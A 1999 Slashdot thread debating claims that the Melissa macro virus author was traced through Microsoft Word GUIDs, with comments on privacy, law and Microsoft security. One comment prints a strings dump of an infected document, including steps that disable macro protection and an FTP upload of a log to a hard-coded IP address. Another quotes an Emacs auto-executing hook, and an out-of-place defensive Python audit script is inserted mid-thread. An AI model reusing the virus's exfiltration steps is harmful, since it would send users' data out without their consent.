Melissa Creator tracked using MS's ID numbers?

So last week there was a lot of hype about Microsoft embedding IDs into documents that would allow tracing of authors. This week there was hype about Melissa- yet another lame doomsday macro virus (intentionally not posted here because I found it stupid). But mix the 2 together, and you get a story sent to us by stevew: the Melissa Virus can supposedly be traced to its creator using those annoying little ids. They don't have exact details, but the article says that it came from AOL.

  • by Anonymous Coward
    MSNBC has an article [msnbc.com] on the supposed "source" of the virus, and towards the bottom is a picture of the "original posting" to alt.sex [alt.sex]. You can make out the e-mail address of SkyRocket, believed to be the originator. Boy, I'd hate to have to check his e-mail tonight! ;-)

    EH
  • by Anonymous Coward
    HTML doesn't have viruses and no one cares who first wrote it.

    Whenever I try to put Unix in at our company there is always a fuss thrown by middle-managers; but when something like this happens, they shrug?
    Let's face it: Microsoft products are glitzy but they are not secure, not robust, and often not correct. It's time to back public protocols for business solutions and to be responsible by supporting correct and reliable standards and programs.
  • by Anonymous Coward
    What if Microsoft was behind the whole thing? This way, they can justify the use of the GUID's.

    It was just too easy to catch up to the culprit. I don't think any self-respecting cracker would leave such obvious fingerprints.

    Think about this too: This was a clever virus that used Outlook and Office to spread itself. Why didn't anyone do this before? Because only Microsoft programmers would think of such a thing!

    BTW... If anyone takes this post too seriously, then they need to take more humor lessons. :)
  • ...as Bill Clinton might say.
  • by Anonymous Coward
    Hmm... I think it is documented somewhere.
    At least it is ascii.

    I use Applixware and have found that RTF is
    the best way to exchange documents with
    the 'dark side' of the company. Things sorta
    go both ways without too much degradation.
    Even pictures.

    I'm trying to get them to send RTF when they
    mail documents to other people so we don't get
    those embarrassing "your document has a virus"
    emails.

    -- cary
  • by Anonymous Coward
    Our civilization should have learned the
    hard way that diversity is good, and having
    a critical infrastructure based on identical
    systems is bad. The Irish potato blight comes
    to mind, as does health problems in race
    horses and Mr Morris's worm.

    Without diversity the whole infrastructure
    is 'brittle' wrt new threats. With diversity
    there is strength. That in itself should be
    reason enough to prevent one entity's
    domination of the information technology
    infrastructure, be that cisco, microsoft, intel,
    or even (gasp!) Linux.

    This is one of my pet peeves, and everyone needs
    a pet.

    -- cary
  • by Anonymous Coward
    /* anyone
    smart enough to engineer this type of thing would
    be smart enough to be able to cover their tracks.. */

    Nonsense. It's just a macro virus, not a balanced AVL tree. It doesn't take a genius to write a macro virus.
  • by Anonymous Coward
    I dunno. Maybe I'm paranoid. But I was thinking, "Yanno, If I were MS and I were catching flak for this whole privacy thing, I'd consider something like this."

    Their record shows they're not above dishonesty if they think it will advance their public image. They've never done anything quite so destructive in the past if you don't count inflicting Windows on us all, but I'm afraid I find the scenario plausible. I really believe that they would do this if they thought they could get away with it.

    Trust no one.
  • by Anonymous Coward
    /*

    Doesn't it scare people here what can happen to you for programming something on a computer? */

    No more than the conviction of Ted Kaczynski scared me about what could happen to me for making something in my kitchen. And like Kaczynski, it's a lot more scary knowing that malicious bastards are out there.

    Virus writers and crackers need to be given some serious jail time and fines. They cost the economy a great deal of money. They've been able to get away with this crap for way too long. I hope they catch the little SOB and throw the book at him.
  • by Anonymous Coward
    If you think about this, using the ID to track the writer is probably legal. After all, it's legal to use your fingerprints to convict you of a crime. IMHO this is no different. User happened to leave his dirty little fingerprints in a couple of places on the net. Open and shut book there.

    HOWEVER, this is also hardly more than circumstantial evidence. I bet it would be trivial to write a perl program to go out to j.random.word.document on the web, extract the GUID, and overwrite the GUID of a word document that you've created. If I were out to get someone (Like a competing cracker, for instance) that's exactly what I would do. The Melissa virus came out well after the news of the ID had been posted.

    If I used Microsoft products, I'd prove this by writing a program to do just that. Might have to borrow a 'doze box long enough to get a few word documents to play with. That's assuming a "Swap your GUID" script isn't already on rootshell for the script kiddies' downloading pleasure.
  • I'm sure that the law enforcement community can find some law that the Melissa author violated.

    But Microsoft has written code that (1) its purpose (and effects) are not disclosed (2) is purposely malicious to users (collecting GUID's, embedding irrelevant private hidden information in documents (I'm referring here to directory trees, other file contents etc.) (3) is widely disseminated without user knowledge (except for the "trojan" part e.g. wordprocessor, browser, etc.) (4) generates network packets that the user does not know about or initiate directly.

    Microsoft's motivation for these actions was profits and power. The virus writer's motivation was? Microsoft has inflicted serious costs onto individuals, businesses, etc because of such software "hidden features." So even if intent is part of the statute, Microsoft had intent. It is harder to imprison a corporation than an individual, but fines etc. are easy to impose.

    ;-)
  • by Anonymous Coward
    There are people whose lives (not livelihood) depend on their anonymity. Suppose your document regarding government officials is intercepted on its way to Amnesty International. This whole episode should give those government officials a pretty good idea how to track the culprits down if the document was written in Word. Thank god for ASCII and PGP!

    KN
  • by Anonymous Coward
    Life in prison? Death? For a freaking computer virus? Yes, I agree they cause lots of problems, but I don't think you should kill the dude!

    What would you get for a speeding ticket? Your right foot chopped off?
    (hey, this is beginning to sound like those middle eastern countries!)
  • by Anonymous Coward

    Kevin Mitnick accepted a plea bargain... and denied the Feds a show trial. He certainly wasn't going to get a fair trial, not after being held in jail for *four years* and denied reasonable access to the evidence in order to prepare a defense.

    Less than a week later Melissa is introduced... and now we learn of "proof" that the author was a known virus writer. The "proof" is that the MS GUID in the virus matches that readily available in documents posted on his web site.

    In other words, the "proof" is precisely as valid
    as my "proof" that I wrote Linux in 1972. After all, who can argue with the timestamp on the files?!


    Do I really believe this is a deliberate attempt to frame someone for political purposes? No. Do I believe that Kevin Mitnick is totally innocent and should have never spent a day in prison? No.

    But I *do* believe in history's lesson that the way we treat the Kevin Mitnick's and Larry Flynt's of the world today is how *we* will be treated tomorrow. I find it deeply disturbing that Kevin Mitnick, accused of *no* violence, was held prior to trial far longer than either Timothy McVeigh or Ted Ka^H^H^H^H the Unabomber. It is significant that the latter two individuals faced the death penalty, while Mitnick will now be out within a year. Where is the justice in a system where an individual, even if acquitted, will spend the same amount of time in prison?!

    I further believe that nothing is more dangerous to freedom than a grandstanding prosecutor. The Communist witch hunts in the 50's are a classic example, and already I can hear the questions:

    Are you now, or have you ever been, a hacker?

    Do you now, or have you ever, associated with known hackers?

    The very real differences between "hackers" and "crackers" will matter no more than the differences between active Soviet sympathisers and the "fools" who didn't believe that 1950's America was the peak of human civilization and culture.

    The bottom line, today, is that any defense lawyer who uses this as a defense is an idiot. I would not convict on this evidence alone, but neither do I find it particularly likely that it is, in fact, a setup.

    The bottom line, tomorrow, is that the feds need to be careful with how they handle crackers because reasonable people *are* starting to ask questions about the way such cases are treated. The worst a cracker could do is a drop in the bucket compared to the damage caused by distrust of prosecutors. (Prime examples: AG Meese's comment that "there are, by definition, no innocent suspects" or Kenneth Starr effect on the debate over renewing the independent counsel law.)

  • I got a Word document emailed to me the other day -- since I was on a unix box at the time, I used 'strings' to have a quick look at it. Here is part of what I found (just the juicy bits):

    (Note: I'm pretty clueless as to the internal workings of Word documents, but it looks like the virus writer was kind enough to comment his/her code!)


    - this is a marker!
    Declare Variables
    Initialize Variables
    Switch the VirusProtection OFF
    HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info
    LogFile
    ' Log
    file -->
    ' Log
    file -->
    C:\hsf
    .sys
    c:\netldx.vxd
    o 209.201.88.110
    user anonymous
    pass itsme@
    cd incoming
    ascii
    put
    quit
    command.com /c ftp.exe -n -s:c:\netldx.vxd
    HKEY_CURRENT_USER\Software\Microsoft\MS Setup (ACME)\User Info
    LogFile
    Make sure that some conditions are true before we continue infecting anything
    Tru
    Infect the NormalTemplate
    ed = T
    alTe
    veDocu
    Write a log file of this NormalTemplate infection
    hh:mm:ss AMPM - $
    dddd, d mmm yyyy$
    ode
    ime, "
    Infect the ActiveDocument
    empl
    tiveDo
    mmm y
    Logfile -->3) &

  • by Anonymous Coward
    But will people really blame Microsoft? When we had gas
    shortages in the mid 70-s, I recall people
    blaming the Arabs, the oil companies, and the government.
    But few blamed the car manufacturers, who had
    been pushing gas-chugging monsters for more than a decade,
    or themselves, for buying those cars.

  • by Anonymous Coward
    If I remember correctly, Melissa & Melissa's "Poppa" get around the so-called "macro virus protection" in Office 97 by telling Office 97 to turn it off (without informing you). I don't think you should give M$ any credit at all.
  • by Anonymous Coward
    Those who would give up freedom for security will deserve and receive neither.
  • by Anonymous Coward on Tuesday March 30, 1999 @09:04AM (#1956782)
    5-10 years and $350,000? What the f*ck is that? Maybe Microsoft should be slapped with a class action lawsuit for setting up the infrastructure that allowed this virus to spread.

    This punishment does NOT fit the crime done. Basically, all this guy did was write some code (if you want to call it that). I will not deny the code was malicious, but we don't know why he did it. I could see someone trying stuff like this "just for the hell of it". Besides, if this guy hadn't done it, that security hole would have remained, and if it had been presented a year from now (presumably when even more people will be using email) it could have been MUCH worse.

    Basically, they are setting the punishment based on the fact that it scared the shit out of the FBI and lots of other people, not based on the actual crime committed.

    Doesn't it scare people here what can happen to you for programming something on a computer?
  • ...that you build your OWN slashdot? Rob, being the greedy selfish bastard he is, provided you with source code. All you gotta do is untar it, and start posting.

    In the mean time, in order to get back at him, might I suggest you:

    Stop contributing code.
    Cancel that membership check.
    Cancel that donation check.
    Halt shipment of that new hardware you sent.
    Stop contributing stories.
    Stop making helpful suggestions.

    Oh, wait, my bad, you DON'T do any of this. Ok, so that gives you... WHAT right to tell him how to run the site HE built, and HE funded, and HE works full time on?

    If YOU, being God and all, feel you can do a BETTER job, then do it. Surely one with your wisdom and 377373 news posting skills can build a better slashdot than slashdot. And when you do, the masses will flock to it... right?

    *If you make no effort to help, then DON'T knock a free service provided by the generosity of an (ex)student's heart!*

    Jackass...

    --

  • by Shiska ( 131 )

    ... if matched with a person, could lead law enforcement officials to the author of the prolific virus ...

    Uhm... "law enforcement officials" ? ... Since when was it illegal to write a virus?
    ----------------- ------------ ---- --- - - - -
  • What happened to privacy? Well, basically commercialism. Microsoft (or just about any company anymore) wants to get as much information as they can on users (refer to that whole banking deal a while back). They've got an OS, office program, various programming programs, all using proprietary file formats. Now considering all this is done with closed source, no specs on the file formats, etc, who's going to know that there's MAC address and whatever else they want to include in your Word document? All the meanwhile, they are crying, "Closed information is the only way to be secure!! Open source means you'll be hacked into!! Arggggggggggh!"

    Didn't the original articles on this information being in documents say something like it dated back even into the Windows 3.1 era? So, they've gotten away with it for all these years. And now we're starting to see just what these sort of companies want from us.

    Starcraft was sending all kinds of information from the registry to their battle.net servers if you typed an invalid password, as well. Of course they wrap it around, "We did it to help our customers, yeah, that's it, help them." And Intel really just put the ID in the P-III as a replacement for cookies, remember web page settings, sure.

    So all this is going on all these years, and people just don't care. They accept the products from giant corporations, and go with it.

    With all this going on, Open Source really can take the lead in security/privacy concerns. We need to shout, "Here are our guts, program code, file formats, etc. Critique them, find holes/problems." Only with open sources can people be REALLY sure none of these scrupulous programmers include this sort of information in files.
  • Or better yet, can two different MAC address possibly generate the same GUID?
  • It may have once meant Revisable Text Format...but all documentation I've read of late calls it RICH Text Format (meaning that it can have font properties and color).
  • From the way I read it, it sounded like they didn't even need the GUID to catch the guy, they had already traced Patient Zero to the alt.sex newsgroup and had his AOL address, which they could easily have turned into a real name and address with the correct warrant.
  • ...for me, at any rate.
    I use only MacOS and Linux, have never owned a copy of Word, and to the best of my knowledge there is nothing vaguely resembling a COM object anywhere on my system, even without my taking special precautions.
    Of course, in order to be able to say this I had to NOT USE MICROSOFT PROGRAMS, so obviously I'm the loony, right? It's just, well, not normal not to use Microsoft programs. Even Linux users use Microsoft programs (on the average). At least I have the consolation of this: it'll be easier for me to convince the FBI not to have me shot as owner of the GUID, because there's never been any indication that I _could_ write macro virii, due to my lack of Microsoft programs :)
    Such a world we live in! o_O
  • Methinks I'll go convert all my old Office documents into RTF.

    You mean, you haven't already? :P

    Mine are in RTF, plain text, and I'm thinking about trying out HTML (hate trying to get everything lined up correctly though).

  • I think it's time for a new format (OTF maybe?)

  • by DrSpoo ( 650 )
    There is nothing wrong with using PINE to do email. I have been for over a year and other than the fools that send me WINMAIL.DAT attachments it works fine! Hell, even works via telnet so I can be almost anywhere on the planet and still get my mail.
  • Posted by speed1:

    This just shows how MS programs with poor security can lead to an invasion of privacy.

    We can see in this case how it's being used to track the author of Melissa...how long will it take so they can track down anyone else.
  • Posted by tsturm:

    As for privacy, we should pay close attention to the development of all this. This is a mediatic demo for IDs and also for Clipper chips (so that the "bad guys" can be traced, right?). The supporters of those features and technologies will certainly use this as a showcase.

    On the other hand, doesn't the ease with which those GUIDs were traced suggest how easily everybody's privacy can be broken into?

    I would say that with the right spin (where are those privacy groups when you need them?) this case could be a perfect demonstration of what the GUID/Privacy issue a few weeks ago was all about.

    M$ blatantly mishandled their users' privacy by putting GUIDs into each document that are so easy to be traced - even by outsiders, like those two guys from the ZDNet story.

  • Posted by Dr. Bert:

    I'm all for crucifixion of digital vandals. But this is a perfect example of why I refuse to use Microsoft products for any reason.
  • Posted by skitzo:

    I find it hard to believe that anyone could trust this stupid ID tracking system MS has embedded into their programs...I also don't know about the validity of this argument that they can even track the person who has created it. It seems like an overly bloated attempt to make something of nothing simply because of the quick spread of the virus. Lastly, anyone who has been infected ought to rethink their attempt to be computer savvy because it's obviously not working.


    lataz...
  • Posted by Bryan Lawson:

    Given that so many know vb, especially so many new young programmers who are still pumped with their rebel phase, and know (and have known for a LONG time - microsoft?) how easy it is to create macro virii, I am surprised we haven't seen more Melissa types ages ago. We are certainly gunna see a lot more now, as the mutations and copies already surfacing show.

    I just hope the media pick up on the fact that this wouldn't (couldn't) happen if ms showed at least a modicum of respect for user level security.
  • Remember, Kenneth Starr couldn't tape record Monica Lewinsky's phone conversations w/o her consent or a warrant, but Linda Tripp could as she is a private citizen and not subjected to the same restrictions as law enforcement.

    Laws regarding recording phone conversations vary from state to state. In some states what Tripp did was perfectly legal ... in others, completely illegal and inadmissible by Starr. I guess he was lucky it was in DC. *grin*

    My point was that the illegal search argument would be what I would use as a defense since there is no clear precedence set in this regard. Information obtained by a 3rd party without the defendant's knowledge is very shaky ground in court, especially when it's a commercial 3rd party as Microsoft is.

    If I planted a bug in your system (via a macro virus, yaay!) that logged all keystrokes and internet traffic, would I then be allowed to prosecute you when you went to a kiddie-porn site or downloaded the latest Quake III warez? I don't think so because I, as a 3rd party, violated your private space. I would actually be PROSECUTED as such. The argument can be made (and possibly successfully) that MS violated this person's private space by recording unique information about that space and broadcasting it publicly (even if embedded in a document now made public).
  • Essentially, MS Word does a type of digital signing on a document. If you release a signed file, well... too bad.

    Since this digital signature is hidden from the user completely, I disagree that once you release the document publicly, it's your fault the data got out.

    If Outlook attached your credit card number to each outgoing mail message without your knowledge, would you then be liable for all fraudulent purchases on that card since you sent an email? No, I don't think you would be.

    I don't see how someone can be held responsible for consequences of sending out data that they do not know is being sent.
  • Just as it's not a problem for the Gov't to take fingerprints off a letter that you sent or DNA samples from the saliva you used to lick a stamp or an envelope shut. Once you voluntarily give something up, it's fair game for the man.

    I agree completely, except that until recently, no one even KNEW they were giving up their MAC address simply by publishing a Word document. Considering how new this knowledge is, it's safe to say that many STILL do not know.

    You can only voluntarily give up something you KNOW you have ... the unknown data attached to it without your consent by a 3rd party should not fall under these same rules.

    How many people (beyond slashdot) even KNOW what a MAC address is and how it's created?! I would venture a guess that 65% of computer users are clueless about this aspect of networking technology.
  • I will have to research the cases you cite, thanks for pointing those out.

    I find it very hard to swallow however, that evidence gained from illegal activity is admissible in court in all instances. If this were the standing precedence, why wouldn't the cops simply get non-cops to break into people's houses to search when they can't get a warrant? Why wouldn't they get non-cops to plant bugs and cameras in crack houses to get evidence?

    I think there may be a fine (although gray) line between inadvertent discovery during a crime and out right pursuance of evidence during a crime. This may explain why if you found a body in my basement during a B&E, I would get charged but if you went in and planted a camera for the specific purpose to taping what I do in my own house and that tape caught the killing, that would not be admissible. (However, I'm sure it would be enough to get me arrested and the body found subsequent would be enough to convict me. *grin* There is a big difference between evidence required to arrest/detain and evidence required to convict.)

    To me this is a clear distinction. The MAC address is not attached to the word doc by chance, it was programmed to do that, specifically. This "theft" of unique personal data was not inadvertent, rather it was blatant.
  • First, the existence of the GUID in Word documents was not "recently discovered." It's part of the spec, and it's been known about for a long time.

    What spec? Since word documents use a proprietary format, I don't think there is an open spec available for inspection by the public. If there IS such a document, please point me towards it. If there is NOT such a document available to the public, then I would still consider embedded MAC addresses in .doc files as "recently discovered".

    The ZDNet article also goes into detail about how the GUID was matched with another GUID from a document on a website owned by a known virus author. Considering the uniqueness of the MAC address utilized in the GUID, it is highly unlikely, if not impossible that the two documents were not created by the same machine.

    The report never mentioned anything about using the gathered MAC address from Windows 98 registrations to track down this person. Where are you getting that from?

  • Your points are very valid regarding current privacy statutes. My point was that this is uncharted waters and the argument could (should?) be made against 3rd party distribution of our unique data without our knowledge.

    People are well aware of Caller-ID and there is a publicly available mechanism to disable this feature. I have no problems with that.

    I'm not suggesting this argument to get around the crime itself, I'm suggesting it as a way to protect others from being victimized for non-criminal acts that may be unpopular.

    If it stands that 3rd parties can "implant" everything you do with an ID that you do not know about or cannot turn off, free anonymous speech will disappear as we know it. That's my main concern.
  • I wholeheartedly agree. Many are missing the bigger picture in this instance.

    If federal authorities USE this 3rd party tracking mechanism to convict, it will VALIDATE the notion that anyone, as long as they are not law enforcement, can implant people, their ideas, and their works with hidden identifiers to track them down at a later date.

    In many respects, this is similar, if not identical to key escrow.

    If this evidence IS used against this person, Bell Atlantic/Pac Bell may just start tapping our phone lines TOMORROW with the off chance that we will say something that can be used against us in court. It would be the same thing since it's a 3rd party, NOT law enforcement, invading our privacy to gather evidence against us.
  • by DaBuzz ( 878 ) on Tuesday March 30, 1999 @09:34AM (#1956805) Homepage
    I'm not sure if use of such GUID's would hold up in court since it is private information gathered by an illegal search. The user did not give permission for his unique ID to be attached to his .doc file. The app (Word) had no just cause to attach this ID either so it's similar to having the feds tap your phone without a warrant.

    While I am not defending this moronic macro virus creator, I do think that utilizing these GUID's is setting a BAD standard in regards to a person's right to publish anonymously.

    What's next, they track down the GUID of the person who wrote an anti-Clinton .doc and posted it online?
  • It used to be that the biggest security hole in any network was a badly configured firewall (or lack thereof), now it's MS Word and MS Outlook!

    I can just see the day this was decided at The Collective ...

    [Insert wavy flashback effect]

    Five of Seven: "Hey, Three of Five, let's give Word the ability to run external executables!"

    Three of Five: "Cool! But let's make it so that it can do this from within a macro!"

    Five: "Sounds good. How about we add a startup macro that launches when the document is opened?"

    Three: "Hmm, should we allow the user to turn off startup macros?"

    Five: "Hahaha! What for? No one is going to use this for evil! This is a Good Thing[tm]!"

    [Fade back to present]

    Sad, just plain goddam sad.
  • This just gets down to the point.. we really need easier ways for government and industry to track our movements. Perhaps something injected into the arm at birth that would constantly relay a signal to a series of receivers? This way we can easily track those evil criminals and bad people and find lost children and do all kinds of good stuff. :-) *sarcasm*
  • Hey, I like word macros.

    How else are you supposed to get a shell on a system that's "secured"? (okay, I know, there are tons of ways, like Excel macros, or not-disabled Windows function keys, or changing, say, the Telnet proxy in netscape to run the command interpreter...)

    I think one of my favorite oxymorons is "Windows Security". It's a good analogy, too. Want to break into a house? Break a window.
  • Heh. I'd been thinking the same exact thing when I saw this headline on the front page. Gee, wouldn't it be interesting...
  • My understanding was that it was a VBscript macro virus. So basically, unless you open a Word/Excel/whatever document up that contains the macro virus, it has no scripting host to run on, so you can't pick it up that way.
  • Did you READ the article?

    If you had, you'd note that it said the GUID number is in part based on the MAC address of the system's Ethernet card. Please, read the article next time. You'll be more informed, and everyone will be happier.
  • Absolutely! It is a very slippery slope, and we've already started down it. I notice that ID chip implants are already becoming common for pets. That gets the chips into mass manufacture, and gets the chip readers out there.

    The next 'great beneficial use' will probably be the mentally infirm. Once it helps out there, children will be next. Don't be surprised to find out it's a lot easier to get the chip implanted in a 3 year old than it is to have it REMOVED from an 18 year old. (beyond the fact that it's harder to dig one out than to put one in).

  • That some loser on AOL wrote a virus for the biggest abomination of an office suite on the planet? This goes back to the monkey theory, I think. Heh. :)
  • First of all, some of the mailservers were put out of operation, and some sites had to disconnect mail service. That's harm.

    Second, the change in machine state causing an undesirable activity is vandalism. Painting the next Mona Lisa on the side of a building would be vandalism, even if the owner was then able to sell the wall for $1M.

    Third, while it may impose no additional cost to the victim, sending mail from his machine was an act with economic value; the improper use is theft and/or trespass.

    Fourth, the message sent would be likely to cause problems between the sender & recipient.

    I see no way in which the virus *isn't* harmful.

    hawk, esq.
  • If you're looking for me to argue that MS products are any good, look elsewhere :) The last ones I have *anything* non-negative to say about are word 5.1 and excel 4.

    But harmful as the products may be, and even if they're more dangerous than the virus, the fundamental legal difference is permission (except for transmission of data to microsoft, which would also violate assorted laws)

    hawk, esq.
  • It's not the *writing*, but the willful and knowing *release* of the virus that's a crime.

    The Common Law, and I presume most other legal systems, attribute the same intent to the natural consequences of an act as the act itself. Even without any modern "computer" crimes, the release & spread created numerous criminal trespasses against chattels (improper contact with machine), vandalism, and (the law of the individual state permitting) a general common law misdemeanor.

    Larceny (theft) probably wouldn't cut it in this case, as an element is the intent to permanently deprive.

    hawk, esq.

    And no, this isn't legal advice.
  • by Masem ( 1171 ) on Tuesday March 30, 1999 @08:58AM (#1956818)
    While I am probably being paranoid and overly sceptical, it's way too convenient that the Win98 ID bug, only uncovered recently, is suddenly going to be the life saver for solving the Melissa problem. And all only 2 weeks before the anti-trust trial resumes.

    But, even if this is the case, I really wish there was something that could be done against M$ for introducing the entire concept of Word viruses to the world; if they had introduced the security needed into the vis basic routines when they first put out Word 6, things wouldn't be as rampant now.

    Plus, this only goes to show that when only one company makes all the programs that you use, it's rather easy to find all the loopholes between them all. (Hint, there's better, more established ways to do interprocess communication than a proprietary system).
  • the interesting thing is that the virus doesn't *DO* anything harmful, except spam mailservers.


  • Since a word document only has the GUID of the original document author, and all these Word Macro viruses are made by taking somebody else's Word Macro Virus (WMV) document and modifying it, all the GUID does is point back at some guy who wrote the original WMV that was the grandfather of Melissa. See this article [zdnet.com] for more details.
  • [Don Box] wrote this script that generates GUIDs in the open...

    Oh? And have you seen how this site assigns you a cookie too?

    If he wanted to be bad, now he could pair GUID's and your cookies...

    Of course I don't care about it, even if I would, the reasoning to let him generate a GUID for you is a bit weird.

  • This is the worst kind of bloat I can imagine - a fancy text editor mated to a BASIC interpreter. Granted the usefulness of an integrated development environment in your word processor, it is doubly insane to permit programs to run automatically when the document is opened.

    And this is different than Emacs how?

    Oh, I forgot, Emacs uses Lisp.

  • In point of fact, a user must already have write access to your .mailrc and .emacs files (implying that your account was already insecure) to instigate the sort of "virus" you've pointed out above.

    NO!

    Vi used to execute the .exrc file in any directory, including /tmp. You would simply leave a nasty .exrc file in /tmp, wait for people to use a program such as a mail reader that forks off a copy of vi to edit a temporary file and *poof*, you have got them!

    With Emacs, you can put the special tags in any file, and if they are close enough to the start or end of the file, they used to be silently executed. Just email someone with the tags at the end, and if it is the last message in the mail box, *poof* you have got them!

    Ten years ago, these were the *DEFAULTS* for two of the most popular editors on UNIX. They were used in universities which had large numbers of users. UNIX was the most common OS on the Internet. It was a serious problem. The UNIX folks had to learn to set the defaults correctly, just like I hope MS (and other software companies) learns. It is just too bad they didn't learn from the past.

  • Before anyone gets too carried away about the evils of closed source software, it should be remembered that both VI and Emacs have had similar problems, although they were "fixed" many years ago.

    VI used to read any ".exrc" file in the current directory, which could be used to create macro virii. To the best of my knowledge, this option is now turned off by default. (I don't use vi much...)

    Emacs will execute code that is embedded in a file if it has the right tags around it. For example, I have this glob at the end of my .mailrc file:

    # hack-o-rama

    # local variables:
    # mode: text
    # write-file-hooks: ((lambda () (let ((xyzzy (make-temp-name "/tmp/foo"))) (condition-case () (progn (message "Rehacking aliases...") (write-region (point-min) (point-max) xyzzy nil 'foo) (build-mail-aliases xyzzy) (delete-file xyzzy)) (file-error nil))) nil))
    # end:

    About 10 years ago, emacs was changed from automatically and silently running this kind of code, to having the code displayed to the user and a y/n prompt given. Before that time, it was possible to trick Emacs's RMAIL command to propagate a virus through email.

    Still, I am not sure that Emacs's solution is that great. You can still turn the prompting off, and it assumes that the user knows enough about Emacs and Lisp to understand the code.

    I think the real difference between OSS and MS is that OSS ran into these problems long before the Internet became aware to the general public.
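
One way to audit a file for the kind of embedded "Local Variables:" block quoted in the comment above, before opening it in an editor (an added example, not code from the thread or from Emacs). The function names and the two risk heuristics are assumptions of this sketch; the 3000-character window follows Emacs's documented rule for where the list may start, and the sample is the block from the comment.

```python
import re

TAIL_CHARS = 3000  # Emacs only honours a list that starts this close to the end of the file
MARKER = re.compile(r"local variables:", re.IGNORECASE)

# Simplified heuristics chosen for this example (assumption: Emacs keeps its own, longer list).
RISKY_NAME = re.compile(r"^(eval|.+-(hooks?|functions?|command|program|forms?))$", re.I)
LISP_CODE = re.compile(r"\(\s*(lambda|progn|eval|load|shell-command|call-process)\b", re.I)

# Sample input: the .mailrc tail quoted in the comment above.
SAMPLE_MAILRC = r"""alias bob bob@example.org
# hack-o-rama

# local variables:
# mode: text
# write-file-hooks: ((lambda () (let ((xyzzy (make-temp-name "/tmp/foo"))) (condition-case () (progn (message "Rehacking aliases...") (write-region (point-min) (point-max) xyzzy nil 'foo) (build-mail-aliases xyzzy) (delete-file xyzzy)) (file-error nil))) nil))
# end:
"""


def local_variables(text):
    """Return [(name, value)] from the last 'Local Variables:' block near the end of text."""
    lines = text[-TAIL_CHARS:].splitlines()
    for start in range(len(lines) - 1, -1, -1):
        m = MARKER.search(lines[start])
        if not m:
            continue
        # Whatever surrounds the marker is the per-line prefix/suffix (e.g. "#").
        prefix = lines[start][:m.start()].strip()
        suffix = lines[start][m.end():].strip()
        pairs = []
        for line in lines[start + 1:]:
            body = line.strip()
            if prefix:
                if not body.startswith(prefix):
                    break  # malformed block: report what was parsed so far
                body = body[len(prefix):]
            if suffix and body.endswith(suffix):
                body = body[:-len(suffix)]
            body = body.strip()
            if body.lower() == "end:":
                break
            name, colon, value = body.partition(":")
            if not colon:
                break
            pairs.append((name.strip(), value.strip()))
        return pairs
    return []


def audit(text):
    """Flag local-variable entries that name a code-running variable or carry a Lisp form."""
    findings = []
    for name, value in local_variables(text):
        reasons = []
        if RISKY_NAME.match(name):
            reasons.append("variable can run code")
        if LISP_CODE.search(value):
            reasons.append("value contains a Lisp form")
        if reasons:
            findings.append({"name": name, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_MAILRC):
        print(finding["name"], "->", ", ".join(finding["reasons"]))
```

The first-line `-*- ... -*-` form of file variables is not covered by this sketch.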

  • not a month ago, we were having such a fit about MS IDs, and now, a *news-making* macro virus hits, and, TADA! A legitimate use is found for the MS ID.

    Too, too funny. Nice try, Microsoft.
  • User space has nothing to do with it. Or do you suddenly not have the ability to send email from the command line from your user account?

    The reality of this is that StarOffice suffers from the same problem, especially since it can run MS Office macros.
  • You know, I think what scares me most about this is that the punishment in the US for a computer crime is tougher than the punishment for lots of other crimes. Oh, say, domestic abuse or something like that. So, it's worse for someone to write a macro virus than to slap their wife or girlfriend around. (Husband or boyfriend too, just to be P.C.) There's something basically wrong with that.

    I've had computer viruses. Monkey2 and Ripper to be specific. I remember how utterly frustrating they both were. I do think that there are things much worse however. Keep it in perspective is all I can say.

    I dunno. I guess what it comes down to is that I think this says something about our misplaced & completely fucked up value system.

    -Randy

  • But that would be too obvious.
  • In point of fact, a user must already have write access to your .mailrc and .emacs files (implying that your account was already insecure) to instigate the sort of "virus" you've pointed out above. Also the code that enables this sort of behaviour is not found in the default versions of these files distributed by OS or application vendors. MS products are *BY DEFAULT* vulnerable, and the malicious user needs no special access to your machine or files to propagate his attack. This is not the case on most other properly administered and installed OS's.
  • Yet another wonderful aspect of this invasion of privacy is that anyone with a clue could frame anyone that person could get a sample doc from. Releasing the Skyrocket address to the net at large was irresponsible behaviour based on what amounts to hearsay based on an invasion of privacy.
  • I grabbed the Melissa virus from the original alt.sex post and wanted to take a look at it, purely for educational purposes of course. I couldn't find any UNIX tools to do so!

    As you pointed out, while strings will give you some juicy tidbits, you can't extract the full macro contents that way (does MS tokenize their VB text?). Neither word2x nor mswordview do anything with macros. LAOLA [tu-berlin.de] includes a tool called ELSER which dumps out embedded macros, but it doesn't work with Word97 documents (which Melissa is). The mswordview [csn.ul.ie] site even linked to a DOS program called List Word Macros [wisc.edu] which I tried, and it doesn't support Word97 either.

    I'd really like to see a dump of this virus, because I'm curious to see exactly what kind of insecurities a macro language would need to have in order to let the author both scan an address book and send email, without doing anything too suspicious in the UI. Does anyone have any better tools for looking at this file?

  • Regardless of the privacy implications of GUID storage in Microsoft documents this story is fishy. There's a vast number of documents written with these products and thus a vast number of GUID's floating about on the internet. To be able to pull up an individual and point the finger at them this quickly is unrealistic, especially given that they say that they found the matching GUID on a web site. They would have to exhaustively search web sites for documents containing the GUID and perform a match on them in order to do this.

    The size of the internet says that this isn't possible. If there is any truth to the story at all it means that this guy was under some other form of surveillance and for that reason his documents were specially selected to be matched. Or it could mean that some portion of this is a sham, maybe the guy was never caught, maybe it was a propaganda ploy by either Microsoft or somebody who boosts Microsoft.

    Until this story is confirmed by a somewhat credible news site I'll chalk off the capture of the perpetrator as an urban legend.
  • have received reports from catdoc users, that they were able to read future plans of their bosses, which wasn't intended to be sent just now.

    yeah, that's a feature of word's "fast save": it uses versioning. so the old text is still there, but not displayed!!

    I heard of someone who used catdoc on a job offer he got, and he was able to read the money they had offered to another person!!

    and to think the corporate world relies on Word!!
  • by acb ( 2797 )
    Couldn't the feds press charges of terrorism, which carries very severe penalties (life imprisonment and the death penalty are both options) against the virus author? Maybe someone will figure that if they make an example of one cracker, others will be "scared straight".
  • by acb ( 2797 )
    Since when was it illegal to write a virus?

    Since a few virus scares back when politicians passed a specific law about writing viruses (or so I recall).
